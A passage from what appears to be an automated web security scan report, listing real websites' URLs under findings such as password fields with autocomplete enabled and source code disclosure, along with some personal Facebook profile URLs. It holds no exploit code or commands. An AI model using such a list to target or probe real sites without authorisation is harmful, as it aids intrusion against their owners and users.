15.341. http://www.quantcast.com/top-sites/GP

15.342. http://www.quantcast.com/top-sites/GQ

15.343. http://www.quantcast.com/top-sites/GR

15.344. http://www.quantcast.com/top-sites/GS

15.345. http://www.quantcast.com/top-sites/GT

15.346. http://www.quantcast.com/top-sites/GU

15.347. http://www.quantcast.com/top-sites/GW

15.348. http://www.quantcast.com/top-sites/GY

15.349. http://www.quantcast.com/top-sites/HK

15.350. http://www.quantcast.com/top-sites/HM

15.351. http://www.quantcast.com/top-sites/HN

15.352. http://www.quantcast.com/top-sites/HR

15.353. http://www.quantcast.com/top-sites/HT

15.354. http://www.quantcast.com/top-sites/HU

15.355. http://www.quantcast.com/top-sites/ID

15.356. http://www.quantcast.com/top-sites/IE

15.357. http://www.quantcast.com/top-sites/IL

15.358. http://www.quantcast.com/top-sites/IM

15.359. http://www.quantcast.com/top-sites/IN

15.360. http://www.quantcast.com/top-sites/IO

15.361. http://www.quantcast.com/top-sites/IQ

15.362. http://www.quantcast.com/top-sites/IR

15.363. http://www.quantcast.com/top-sites/IS

15.364. http://www.quantcast.com/top-sites/IT

15.365. http://www.quantcast.com/top-sites/JE

15.366. http://www.quantcast.com/top-sites/JM

15.367. http://www.quantcast.com/top-sites/JO

15.368. http://www.quantcast.com/top-sites/JP

15.369. http://www.quantcast.com/top-sites/KE

15.370. http://www.quantcast.com/top-sites/KG

15.371. http://www.quantcast.com/top-sites/KH

15.372. http://www.quantcast.com/top-sites/KI

15.373. http://www.quantcast.com/top-sites/KM

15.374. http://www.quantcast.com/top-sites/KN

15.375. http://www.quantcast.com/top-sites/KP

15.376. http://www.quantcast.com/top-sites/KR

15.377. http://www.quantcast.com/top-sites/KW

15.378. http://www.quantcast.com/top-sites/KY

15.379. http://www.quantcast.com/top-sites/KZ

15.380. http://www.quantcast.com/top-sites/LA

15.381. http://www.quantcast.com/top-sites/LB

15.382. http://www.quantcast.com/top-sites/LC

15.383. http://www.quantcast.com/top-sites/LI

15.384. http://www.quantcast.com/top-sites/LK

15.385. http://www.quantcast.com/top-sites/LR

15.386. http://www.quantcast.com/top-sites/LS

15.387. http://www.quantcast.com/top-sites/LT

15.388. http://www.quantcast.com/top-sites/LU

15.389. http://www.quantcast.com/top-sites/LV

15.390. http://www.quantcast.com/top-sites/LY

15.391. http://www.quantcast.com/top-sites/MA

15.392. http://www.quantcast.com/top-sites/MC

15.393. http://www.quantcast.com/top-sites/MD

15.394. http://www.quantcast.com/top-sites/ME

15.395. http://www.quantcast.com/top-sites/MG

15.396. http://www.quantcast.com/top-sites/MH

15.397. http://www.quantcast.com/top-sites/MK

15.398. http://www.quantcast.com/top-sites/ML

15.399. http://www.quantcast.com/top-sites/MM

15.400. http://www.quantcast.com/top-sites/MN

15.401. http://www.quantcast.com/top-sites/MO

15.402. http://www.quantcast.com/top-sites/MP

15.403. http://www.quantcast.com/top-sites/MQ

15.404. http://www.quantcast.com/top-sites/MR

15.405. http://www.quantcast.com/top-sites/MS

15.406. http://www.quantcast.com/top-sites/MT

15.407. http://www.quantcast.com/top-sites/MU

15.408. http://www.quantcast.com/top-sites/MV

15.409. http://www.quantcast.com/top-sites/MW

15.410. http://www.quantcast.com/top-sites/MX

15.411. http://www.quantcast.com/top-sites/MY

15.412. http://www.quantcast.com/top-sites/MZ

15.413. http://www.quantcast.com/top-sites/NA

15.414. http://www.quantcast.com/top-sites/NC

15.415. http://www.quantcast.com/top-sites/NE

15.416. http://www.quantcast.com/top-sites/NF

15.417. http://www.quantcast.com/top-sites/NG

15.418. http://www.quantcast.com/top-sites/NI

15.419. http://www.quantcast.com/top-sites/NL

15.420. http://www.quantcast.com/top-sites/NO

15.421. http://www.quantcast.com/top-sites/NP

15.422. http://www.quantcast.com/top-sites/NR

15.423. http://www.quantcast.com/top-sites/NU

15.424. http://www.quantcast.com/top-sites/NZ

15.425. http://www.quantcast.com/top-sites/OM

15.426. http://www.quantcast.com/top-sites/PA

15.427. http://www.quantcast.com/top-sites/PE

15.428. http://www.quantcast.com/top-sites/PF

15.429. http://www.quantcast.com/top-sites/PG

15.430. http://www.quantcast.com/top-sites/PH

15.431. http://www.quantcast.com/top-sites/PK

15.432. http://www.quantcast.com/top-sites/PL

15.433. http://www.quantcast.com/top-sites/PM

15.434. http://www.quantcast.com/top-sites/PN

15.435. http://www.quantcast.com/top-sites/PR

15.436. http://www.quantcast.com/top-sites/PS

15.437. http://www.quantcast.com/top-sites/PT

15.438. http://www.quantcast.com/top-sites/PW

15.439. http://www.quantcast.com/top-sites/PY

15.440. http://www.quantcast.com/top-sites/QA

15.441. http://www.quantcast.com/top-sites/RE

15.442. http://www.quantcast.com/top-sites/RO

15.443. http://www.quantcast.com/top-sites/RS

15.444. http://www.quantcast.com/top-sites/RU

15.445. http://www.quantcast.com/top-sites/RW

15.446. http://www.quantcast.com/top-sites/SA

15.447. http://www.quantcast.com/top-sites/SB

15.448. http://www.quantcast.com/top-sites/SC

15.449. http://www.quantcast.com/top-sites/SD

15.450. http://www.quantcast.com/top-sites/SE

15.451. http://www.quantcast.com/top-sites/SG

15.452. http://www.quantcast.com/top-sites/SH

15.453. http://www.quantcast.com/top-sites/SI

15.454. http://www.quantcast.com/top-sites/SJ

15.455. http://www.quantcast.com/top-sites/SK

15.456. http://www.quantcast.com/top-sites/SL

15.457. http://www.quantcast.com/top-sites/SM

15.458. http://www.quantcast.com/top-sites/SN

15.459. http://www.quantcast.com/top-sites/SO

15.460. http://www.quantcast.com/top-sites/SR

15.461. http://www.quantcast.com/top-sites/ST

15.462. http://www.quantcast.com/top-sites/SV

15.463. http://www.quantcast.com/top-sites/SY

15.464. http://www.quantcast.com/top-sites/SZ

15.465. http://www.quantcast.com/top-sites/TC

15.466. http://www.quantcast.com/top-sites/TD

15.467. http://www.quantcast.com/top-sites/TF

15.468. http://www.quantcast.com/top-sites/TG

15.469. http://www.quantcast.com/top-sites/TH

15.470. http://www.quantcast.com/top-sites/TJ

15.471. http://www.quantcast.com/top-sites/TK

15.472. http://www.quantcast.com/top-sites/TL

15.473. http://www.quantcast.com/top-sites/TM

15.474. http://www.quantcast.com/top-sites/TN

15.475. http://www.quantcast.com/top-sites/TO

15.476. http://www.quantcast.com/top-sites/TR

15.477. http://www.quantcast.com/top-sites/TT

15.478. http://www.quantcast.com/top-sites/TV

15.479. http://www.quantcast.com/top-sites/TW

15.480. http://www.quantcast.com/top-sites/TZ

15.481. http://www.quantcast.com/top-sites/UA

15.482. http://www.quantcast.com/top-sites/UG

15.483. http://www.quantcast.com/top-sites/UM

15.484. http://www.quantcast.com/top-sites/US

15.485. http://www.quantcast.com/top-sites/US/1

15.486. http://www.quantcast.com/top-sites/US/2

15.487. http://www.quantcast.com/top-sites/US/3

15.488. http://www.quantcast.com/top-sites/UY

15.489. http://www.quantcast.com/top-sites/UZ

15.490. http://www.quantcast.com/top-sites/VA

15.491. http://www.quantcast.com/top-sites/VC

15.492. http://www.quantcast.com/top-sites/VE

15.493. http://www.quantcast.com/top-sites/VG

15.494. http://www.quantcast.com/top-sites/VI

15.495. http://www.quantcast.com/top-sites/VN

15.496. http://www.quantcast.com/top-sites/VU

15.497. http://www.quantcast.com/top-sites/WF

15.498. http://www.quantcast.com/top-sites/WS

15.499. http://www.quantcast.com/top-sites/YE

15.500. http://www.quantcast.com/top-sites/YT

15.501. http://www.quantcast.com/top-sites/ZA

15.502. http://www.quantcast.com/top-sites/ZM

15.503. http://www.quantcast.com/top-sites/ZW

15.504. http://www.quantcast.com/topix.com

15.505. http://www.quantcast.com/trafficrevenue.net

15.506. http://www.quantcast.com/tripadvisor.com

15.507. http://www.quantcast.com/tripod.com

15.508. http://www.quantcast.com/tumblr.com

15.509. http://www.quantcast.com/turbotax.com

15.510. http://www.quantcast.com/tvguide.com

15.511. http://www.quantcast.com/twitpic.com

15.512. http://www.quantcast.com/twitter.com

15.513. http://www.quantcast.com/typepad.com

15.514. http://www.quantcast.com/ups.com

15.515. http://www.quantcast.com/urbandictionary.com

15.516. http://www.quantcast.com/user/login

15.517. http://www.quantcast.com/user/signup

15.518. http://www.quantcast.com/usps.com

15.519. http://www.quantcast.com/verizon.com

15.520. http://www.quantcast.com/vimeo.com

15.521. http://www.quantcast.com/walmart.com

15.522. http://www.quantcast.com/washingtonpost.com

15.523. http://www.quantcast.com/weather.com

15.524. http://www.quantcast.com/weather.gov

15.525. http://www.quantcast.com/weatherbug.com

15.526. http://www.quantcast.com/webmd.com

15.527. http://www.quantcast.com/wellsfargo.com

15.528. http://www.quantcast.com/whitepages.com

15.529. http://www.quantcast.com/wikia.com

15.530. http://www.quantcast.com/wikihow.com

15.531. http://www.quantcast.com/wikipedia.org

15.532. http://www.quantcast.com/wildtangent.com

15.533. http://www.quantcast.com/wimp.com

15.534. http://www.quantcast.com/windows.com

15.535. http://www.quantcast.com/wisegeek.com

15.536. http://www.quantcast.com/wn.com

15.537. http://www.quantcast.com/wordpress.com

15.538. http://www.quantcast.com/wsj.com

15.539. http://www.quantcast.com/wunderground.com

15.540. http://www.quantcast.com/yahoo.com

15.541. http://www.quantcast.com/yellowpages.com

15.542. http://www.quantcast.com/yelp.com

15.543. http://www.quantcast.com/youtube.com

15.544. http://www.quantcast.com/zimbio.com

15.545. http://www.quantcast.com/zynga.com

15.546. http://www.rapid7.com/

15.547. http://www.regonline.com/

15.548. http://www.regonline.com/__articles/products/event~planning~software

15.549. http://www.regonline.com/__features/

15.550. http://www.regonline.com/__images/global/favicon.ico

15.551. http://www.regonline.com/__js.axd

15.552. http://www.regonline.com/__resources/

15.553. https://www.regonline.com/

15.554. https://www.regonline.com/__images/global/favicon.ico

15.555. https://www.regonline.com/__js.axd

15.556. http://www.rei.com/CheckCart

15.557. http://www.rei.com/Logoff

15.558. http://www.rei.com/OrderTrackingLoginView

15.559. http://www.rei.com/RegistrationView

15.560. http://www.rei.com/ShoppingCart

15.561. http://www.rei.com/Transform.do

15.562. http://www.rei.com/YourAccountLoginView

15.563. http://www.rei.com/buyMembership

15.564. http://www.rei.com/pix/help/memberJoinSlideshow09/mem_photos_tb.html

15.565. https://www.rei.com/CheckCart

15.566. https://www.rei.com/CreateNewAccount.do

15.567. https://www.rei.com/ForgotPassword

15.568. https://www.rei.com/Logoff

15.569. https://www.rei.com/OrderTrackingLoginView

15.570. https://www.rei.com/RegistrationView

15.571. https://www.rei.com/ShoppingCart

15.572. https://www.rei.com/WorkflowAction.do

15.573. https://www.rei.com/YourAccountLoginView

15.574. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/css/css/en/ie7.css

15.575. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/css/en/css/en/css/en/css/en/ie7.css

15.576. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/css/en/css/en/css/en/ie7.css

15.577. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/css/en/css/en/ie7.css

15.578. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/css/en/ie7.css

15.579. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/css/en/css/en/ie7.css

15.580. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/css/en/ie7.css

15.581. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/css/css/en/css/en/ie7.css

15.582. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/css/css/en/ie7.css

15.583. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/css/en/css/css/en/ie7.css

15.584. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/css/en/css/en/css/en/ie7.css

15.585. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/css/en/css/en/ie7.css

15.586. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/css/en/ie7.css

15.587. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/css/en/ie7.css

15.588. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/css/en/ie7.css

15.589. http://www.reputation.com/blog/css/en/ie7.css

15.590. http://www.reputation.com/press_room/css/en/ie7.css

15.591. http://www.reputation.com/press_room/the-web-means-the-end-of-forgetting/css/en/ie7.css

15.592. http://www.reputation.com/secure/css/en/css/en/ie7.css

15.593. http://www.reputation.com/secure/css/en/ie7.css

15.594. http://www.soccernews.com/xmlrpc.php

15.595. http://www.socialfollow.com/captcha/securimage_show.php

15.596. http://www.socialfollow.com/profiles/images/loadingAnimation.gif

15.597. http://www.sourceconference.com/

15.598. http://www.sourceconference.com/blog/

15.599. http://www.sourceconference.com/blog/xmlrpc.php

15.600. http://www.tomcatexpert.com/blog/x26amp

15.601. http://www.tomcatexpert.com/blogs/mthomas/x26amp

15.602. http://www.vibrantmedia.com/whatisIntelliTXT.asp

15.603. http://www.viglink.com/

15.604. http://www.viglink.com/about

15.605. http://www.viglink.com/account

15.606. http://www.viglink.com/corp/merchants

15.607. http://www.viglink.com/corp/publishers

15.608. http://www.viglink.com/demo

15.609. http://www.viglink.com/jobs

15.610. http://www.viglink.com/partners

15.611. http://www.viglink.com/policies/ftc

15.612. http://www.viglink.com/policies/privacy

15.613. http://www.viglink.com/policies/tos

15.614. http://www.viglink.com/support/api

15.615. http://www.viglink.com/support/faq

15.616. http://www.viglink.com/tools/coverage

15.617. http://www.viglink.com/users/action

15.618. http://www.viglink.com/users/action/presales

15.619. http://www.viglink.com/users/action/send-verification

15.620. http://www.viglink.com/users/action/signup

15.621. http://www.viglink.com/users/login

15.622. http://www.viglink.com/users/send-verification

15.623. http://www.viglink.com/users/signup

15.624. https://www.viglink.com/users/action/login

15.625. http://www.yellowbook.com/profile/industrial-waste-services_1599831554.html

15.626. http://www.yellowbook.com/yellow-pages/

15.627. http://www4.jcpenney.com/jcp/freeship4u.aspx

15.628. http://www5.jcpenney.com/jcp/

15.629. http://www5.jcpenney.com/jcp/AddToBag.aspx

15.630. http://www5.jcpenney.com/jcp/bag.aspx

15.631. http://www5.jcpenney.com/jcp/bagaction.aspx

15.632. http://www88.jcpenney.com/cm

15.633. http://www.4shared.com/css/common.css

15.634. http://www.4shared.com/css/main.css

15.635. http://www.4shared.com/css/mainWithoutCommon.css

15.636. http://www.4shared.com/js/index.js

15.637. http://www.addthis.com/bookmark.php

15.638. http://www.adidasgolf.com/

15.639. http://www.akamai.com/

15.640. http://www.barracudanetworks.com/

15.641. http://www.barracudanetworks.com/ns/

15.642. http://www.barracudanetworks.com/ns/

15.643. http://www.barracudanetworks.com/ns/company/

15.644. http://www.barracudanetworks.com/ns/privacy/

15.645. http://www.barracudanetworks.com/ns/products/

15.646. http://www.barracudanetworks.com/ns/products/index.php

15.647. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php

15.648. http://www.barracudanetworks.com/ns/products/spam_overview.php

15.649. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php

15.650. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php

15.651. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

15.652. http://www.bing.com/

15.653. http://www.bing.com/challenge

15.654. http://www.bing.com/local/default.aspx

15.655. http://www.bing.com/local/details.aspx

15.656. http://www.bizographics.com/collect/

15.657. http://www.cisco.com/

15.658. http://www.cisco.com/en/US/docs/security/nac/guestserver/release_notes/20/gsrn20.html

15.659. http://www.cisco.com/en/US/prod/collateral/vpndevc/ps5707/ps8418/ps6128/product_data_sheet0900aecd806e98c9.html

15.660. http://www.cisco.com/en/US/products/products_security_advisory09186a0080b74114.shtml

15.661. http://www.csoonline.com/article/679466/source-boston-2011-two-views-on-infosec-interviewing-hiring

15.662. https://www.demandstudios.com/application.html

15.663. https://www.demandstudios.com/verify.aspx

15.664. http://www.denimgroup.com/

15.665. http://www.dico-citations.com/vingt-ans-de-placard-les-b-n-fices-a-se-divise-la-r-clusion-a-s-additionne-audiard-michel/

15.666. http://www.digitalbond.com/

15.667. https://www.digitalbond.com/wp-login.php

15.668. http://www.duechiacchiere.it/wp-slimstat

15.669. http://www.emarketer.com/(S(r0cbc4551ke3ivvedae1jd45

15.670. http://www.emarketer.com/(S(r0cbc4551ke3ivvedae1jd45))/Article.aspx

15.671. http://www.espn.com.br/

15.672. http://www.espncms.com/

15.673. http://www.espnmediazone3.com/us/category/releases/

15.674. http://www.facebook.com/2008/fbml

15.675. http://www.facebook.com/BLane77

15.676. http://www.facebook.com/DOUCHE01

15.677. http://www.facebook.com/ESPNNewYork

15.678. http://www.facebook.com/JohnFerrell

15.679. http://www.facebook.com/KOMONews

15.680. http://www.facebook.com/SaMmFalK

15.681. http://www.facebook.com/angie.eronson

15.682. http://www.facebook.com/cdulitz

15.683. http://www.facebook.com/chester.mitre

15.684. http://www.facebook.com/chris.paulette

15.685. http://www.facebook.com/daryl.shelby

15.686. http://www.facebook.com/deejayeric908

15.687. http://www.facebook.com/deekron

15.688. http://www.facebook.com/haydn.long

15.689. http://www.facebook.com/highrock.singers

15.690. http://www.facebook.com/jill.hightower1

15.691. http://www.facebook.com/khristhianssenj

15.692. http://www.facebook.com/pages/ESPNNewYorkcom/109006945794439

15.693. http://www.facebook.com/pages/Paul-Deanno-KOMO/164817400226610

15.694. http://www.facebook.com/pages/Shannon-ODonnell-KOMO/174655965888526

15.695. http://www.facebook.com/pages/Steve-Pool-KOMO/115354065200981

15.696. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

15.697. http://www.facebook.com/pauldeannokomo

15.698. http://www.facebook.com/profile.php

15.699. http://www.facebook.com/raymond.cree

15.700. http://www.facebook.com/scottskomo

15.701. http://www.facebook.com/sharer.php

15.702. http://www.facebook.com/stevepoolkomo

15.703. http://www.facebook.com/tracey.westerlund

15.704. http://www.facebook.com/viglink

15.705. https://www.facebook.com/ESPNNewYork

15.706. http://www.freebox-v6.fr/

15.707. http://www.freebox-v6.fr/index.php/blog/article/52/Demandez-votre-Gamepad

15.708. http://www.freebox-v6.fr/index.php/blog/article/74/Freebox-V6-le-point-sur-les-livraisons

15.709. http://www.garage4hackers.com/showthread.php

15.710. http://www.google.com/

15.711. http://www.google.com/aclk

15.712. http://www.google.com/advanced_search

15.713. http://www.google.com/bookmarks/mark

15.714. http://www.google.com/cse/home

15.715. http://www.google.com/finance

15.716. http://www.google.com/gen_204

15.717. http://www.google.com/history/optout

15.718. http://www.google.com/images

15.719. http://www.google.com/imghp

15.720. http://www.google.com/language_tools

15.721. http://www.google.com/mbd

15.722. http://www.google.com/prdhp

15.723. http://www.google.com/preferences

15.724. http://www.google.com/quality_form

15.725. http://www.google.com/realtime

15.726. http://www.google.com/search

15.727. http://www.google.com/webhp

15.728. https://www.google.com/accounts/Login

15.729. https://www.google.com/accounts/ServiceLogin

15.730. http://www.insideup.com/openx/www/delivery/ajs.php

15.731. http://www.insideup.com/openx/www/delivery/lg.php

15.732. http://www.isecpartners.com/

15.733. http://www.mandiant.com/

15.734. https://www.mcafeesecure.com/RatingVerify

15.735. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

15.736. http://www.meetup.com/San-Francisco-Blog-Club/

15.737. http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5

15.738. http://www.newsvine.com/_wine/save

15.739. http://www.omniture.com/

15.740. http://www.qsstats.com/dcsopi45o100008atviisr6wa_1b1f/dcs.gif

15.741. http://www.quantcast.com/discovery.com

15.742. http://www.quantcast.com/js/top-sites.js

15.743. http://www.quantcast.com/quantcast-top-million.zip

15.744. http://www.quantcast.com/search

15.745. http://www.quantcast.com/user/favorites

15.746. http://www.regonline.com/Register/Checkin.aspx

15.747. http://www.reputation.com/

15.748. http://www.reputation.com/blog/

15.749. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/

15.750. http://www.reputation.com/contact

15.751. http://www.reputation.com/how_to

15.752. http://www.reputation.com/how_to/

15.753. http://www.reputation.com/how_to/talk-with-your-kids-about-social-media-safety/

15.754. http://www.reputation.com/itemAdded

15.755. http://www.reputation.com/myprivacy

15.756. http://www.reputation.com/myprivacy-myreputation-bundle

15.757. http://www.reputation.com/products

15.758. http://www.reputation.com/products

15.759. http://www.reputation.com/services/ajax_updateShoppingCart.php

15.760. http://www.reputation.com/services/panelrenderer.php

15.761. https://www.reputation.com/myprivacy

15.762. https://www.reputation.com/myprivacy-myreputation-bundle

15.763. https://www.reputation.com/products

15.764. https://www.reputation.com/reputationdefender

15.765. https://www.reputation.com/secure/reg1

15.766. http://www.s21sec.com/

15.767. http://www.seaeagle.com/default.aspx

15.768. http://www.searchsecurity.com/

15.769. http://www.sourceconference.com/blog/wp-login.php

15.770. http://www.spormeon.com/adverts/www/delivery/ajs.php

15.771. http://www.stumbleupon.com/submit

15.772. http://www.turbomeca.com/

15.773. http://www.yelp.com/search

15.774. http://www.youtube.com/

15.775. http://www.youtube.com/results

15.776. http://www.youtube.com/user/4sharedTEAM

15.777. http://www.youtube.com/watch

15.778. http://www2.comscore.com/analytics

15.779. http://www2.comscore.com/l/1552/2009-09-24/F0PER

15.780. http://www22.verizon.com/privacy/

15.781. http://www4.jcpenney.com/jcp/JCPRoute.aspx

15.782. http://www5.jcpenney.com/jcp/X6E.aspx

15.783. http://www88.jcpenney.com/cm

15.784. http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk=&udj=uf('a',%20577,%201298497076)

15.785. http://xads.zedo.com/ads3/a

16. Password field with autocomplete enabled

16.1. http://www.4shared.com/

16.2. http://www.4shared.com/enter.jsp

16.3. http://www.4shared.com/enter.jsp

16.4. http://www.4shared.com/index.jsp

16.5. http://www.4shared.com/loginBox.jsp

16.6. http://www.4shared.com/signUpBox.jsp

16.7. http://www.4shared.com/signup.jsp

16.8. http://www.admarvel.com/

16.9. http://www.admob.com/

16.10. http://www.bluefountainmedia.com/login

16.11. http://www.coach.com/online/handbags/OrderStatusView

16.12. http://www.cudaeye.com/

16.13. http://www.cudaeye.com/trial.html

16.14. http://www.demandmedia.com/studios/writers/

16.15. https://www.demandstudios.com/application.html

16.16. https://www.demandstudios.com/application.html

16.17. http://www.digitalbond.com/2008/07/20/managing-your-security-career/

16.18. https://www.digitalbond.com/wp-login.php

16.19. http://www.facebook.com/2008/fbml

16.20. http://www.facebook.com/BLane77

16.21. http://www.facebook.com/DOUCHE01

16.22. http://www.facebook.com/ESPNNewYork

16.23. http://www.facebook.com/JohnFerrell

16.24. http://www.facebook.com/KOMONews

16.25. http://www.facebook.com/SaMmFalK

16.26. http://www.facebook.com/angie.eronson

16.27. http://www.facebook.com/cdulitz

16.28. http://www.facebook.com/chester.mitre

16.29. http://www.facebook.com/chris.paulette

16.30. http://www.facebook.com/daryl.shelby

16.31. http://www.facebook.com/deejayeric908

16.32. http://www.facebook.com/deekron

16.33. http://www.facebook.com/haydn.long

16.34. http://www.facebook.com/highrock.singers

16.35. http://www.facebook.com/jill.hightower1

16.36. http://www.facebook.com/khristhianssenj

16.37. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

16.38. http://www.facebook.com/plugins/likebox.php

16.39. http://www.facebook.com/profile.php

16.40. http://www.facebook.com/raymond.cree

16.41. http://www.facebook.com/scottskomo

16.42. http://www.facebook.com/sharer.php

16.43. http://www.facebook.com/tracey.westerlund

16.44. http://www.facebook.com/viglink

16.45. https://www.facebook.com/ESPNNewYork

16.46. http://www.garage4hackers.com/showthread.php

16.47. https://www.google.com/accounts/Login

16.48. https://www.google.com/accounts/ServiceLogin

16.49. http://www.insideup.com/login.html

16.50. http://www.insideup.com/login.html

16.51. http://www.komonews.com/younews

16.52. http://www.komonews.com/younews

16.53. http://www.komonews.com/younews

16.54. http://www.komonews.com/younews/116761799.html

16.55. http://www.komonews.com/younews/116762164.html

16.56. http://www.komonews.com/younews/116762524.html

16.57. http://www.komonews.com/younews/116762774.html

16.58. http://www.komonews.com/younews/116762809.html

16.59. http://www.lemonde.fr/economie/article/2011/04/13/soupcons-d-espionnage-chez-safran-sans-vol-de-donnees-a-caractere-industriel_1506757_3234.html

16.60. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

16.61. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

16.62. http://www.manta.com/mb_34_E33B9_000/refuse_systems

16.63. http://www.manta.com/member/register/

16.64. http://www.manta.com/profile/my-companies/select

16.65. http://www.medialets.com/

16.66. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

16.67. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

16.68. http://www.meetup.com/San-Francisco-Blog-Club/

16.69. http://www.meetup.com/San-Francisco-Blog-Club/

16.70. http://www.quantcast.com/

16.71. http://www.quantcast.com/global/personalHeader

16.72. http://www.quantcast.com/user/login

16.73. http://www.quantcast.com/user/signup

16.74. https://www.rei.com/OrderTrackingLoginView

16.75. https://www.rei.com/RegistrationView

16.76. https://www.rei.com/YourAccountLoginView

16.77. https://www.reputation.com/products

16.78. https://www.reputation.com/secure/login

16.79. https://www.reputation.com/secure/login.php

16.80. https://www.sitefinity.com/login.aspx

16.81. http://www.socialfollow.com/profiles/images/loadingAnimation.gif

16.82. http://www.sourceconference.com/blog/wp-login.php

16.83. http://www.southparkstudios.com/

16.84. http://www.southparkstudios.com/account/login

16.85. http://www.southparkstudios.com/account/login

16.86. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

16.87. http://www.southparkstudios.com/guide/episodes/

16.88. http://www.tomcatexpert.com/blog/x26amp

16.89. http://www.tomcatexpert.com/blogs/mthomas/x26amp

16.90. https://www.viglink.com/users/action/login

17. Source code disclosure

17.1. http://www.4shared.com/privacy.jsp

17.2. http://www.bluefountainmedia.com/cache/js/c1b3af8417e048e3c1419e081a689a40.js

17.3. http://www.bluefountainmedia.com/cache/js/cae45470dfc13dcfbb73abe8d9e1d6e9.js

17.4. http://www.bluefountainmedia.com/ecommerce-design

17.5. http://www.bluefountainmedia.com/flash-design-development

17.6. http://www.bluefountainmedia.com/logo-design

17.7. http://www.bluefountainmedia.com/microsites

17.8. http://www.bluefountainmedia.com/portfolio/flash-demos-and-animations

17.9. http://www.bluefountainmedia.com/portfolio/logo-design

17.10. http://www.bluefountainmedia.com/portfolio/online-marketing

17.11. http://www.bluefountainmedia.com/portfolio/print-design

17.12. http://www.bluefountainmedia.com/portfolio/search-result

17.13. http://www.bluefountainmedia.com/portfolio/websites

17.14. http://www.bluefountainmedia.com/portfolio/websites/business-website-design

17.15. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/all

17.16. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/aviation-and-jets

17.17. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/banking-and-finance

17.18. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/biotech-and-medical-sciences

17.19. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/consumer-products

17.20. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/entertainment-and-media

17.21. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/fashion-and-beauty

17.22. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/green-and-solar

17.23. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/non-profit-and-government

17.24. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/other

17.25. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/real-estate-and-architecture

17.26. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/schools-and-institutions

17.27. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/social-networking-and-venues

17.28. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/specialty-practices

17.29. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/sports

17.30. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/industry/technology-services

17.31. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/page/2

17.32. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/page/3

17.33. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/page/4

17.34. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/page/5

17.35. http://www.bluefountainmedia.com/portfolio/websites/business-website-design/page/6

17.36. http://www.bluefountainmedia.com/portfolio/websites/cms-development

17.37. http://www.bluefountainmedia.com/portfolio/websites/ecommerce-design

